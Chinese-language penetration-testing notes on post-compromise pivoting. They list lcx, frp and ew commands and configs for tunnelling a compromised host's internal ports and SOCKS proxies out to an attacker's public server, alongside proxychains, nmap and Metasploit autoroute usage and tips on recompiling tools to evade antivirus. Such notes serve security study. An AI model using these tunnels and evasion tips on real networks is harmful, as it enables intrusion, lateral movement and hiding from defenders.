端口转发

情景:

A:hacker

B:靶机

C:内网

方向 说明
A - > B -> C
主动连接
B有防火墙时,需要把C端口转到B,B端口再转到A,访问A端口即可
B没有防火墙时,直接把C端口映射到B,访问B端口即可
C -> B -> A
反弹shell
C出网时,可以主动反弹到A的端口,A监听即可
C不出网时,只能反弹到B端口,再通过lcx转发到A端口,注意端口保持相同

lcx

LCX使用

在目标之上使用,及中间机器,用来打内网

A:攻击机

B:靶机

C:内网机器

注意:重新编译可以过特征码杀软

makefile+lcx.c编译:make

命令 说明
lcx -tran 7788 内网ip 6379 把C的6379转发到B的7788
lcx -tran 7789 公网ip 7789 端口需要设置为相同,否则msf无法上线
lcx -slave 公网ip 443 内网ip 端口 把C的6379转发到A的7788
lcx -listen 443 9005 监听A的443出口和9005入口

frp

frp(稳定性强)

只能配置入网,需要配合lcx配置出网

将 frps 及 frps.ini 放到具有公网 IP 的机器上,作为服务端

配置:

默认即可

使用:

frps.exe -c frps.ini

将 frpc 及 frpc.ini 放到处于内网环境的机器上(被控靶机),作为客户端

配置:

[common]

server_addr = x.x.x.x(服务器ip)

server_port = 7000(默认端口)



[ssh]

type = tcp

local_ip = 127.0.0.1(要攻击的内网ip)

local_port = 22(要攻击的内网端口)

remote_port = 6000(服务端ip)

使用:

frpc.exe reload -c frpc.ini 重新加载

注意:
使用msf时,需要使用lcx将靶机(中间机)的监听端口转发到msf的监听端口,两个端口号保持一致,msf监听靶机IP和端口即可

代理转发

分类

HTTP代理

SOCKS代理

Telnet代理

SSL代理

代理类型 说明
正向代理 内向外,服务器对流量进行转发
反向代理 外向内请求,根据域名区分,分发到不同内部网络 对外表现为多个域名为同一个ip地址

代理和vpn区别

代理:

​ 传输层,tcp、udp、http、https流量

​ 默认不包含终端

VPN:

​ 路由层,icmp、dns、http、arp流量

​ 默认包含终端

ew

sockts5代理工具

注:需要使用lcx将靶机的监听端口转发到msf的监听端口(端口号一致)

使用:

无防火墙:

配置代理:被控靶机ip:8080

访问内网ip、端口

ew -s ssocksd -l 8080		# 被控靶机

有防火墙:

配置代理:公网ip:1080

访问内网ip、端口

ew -s rcsocks -e 8888 -l 1080		# 公网服务器
ew -s rssocks -d 公网ip -e 8888 # 被控靶机

代理工具使用

windows:

proxifier

此处nmap扫描端口时不能使用ping的方式,所以需要使用Pn禁ping

nmap -Pn -sT 1.1.1.1

linux:

proxychains4-ng

安装:apt install proxychains4-ng

配置文件:/etc/proxychains.conf,文件末尾只配置一个有效代理

使用:proxychains4 命令

注意:部分软件会丢失参数,py文件最好使用python启动

补充

go版本ew(免杀,可重新编译)

位置 命令
公网服务器: go_ew 8888 1080
被控靶机: go_ew 公网ip:8888

msf的路由转发模块进行内网代理

run autoroute -s 192.168.11.0/24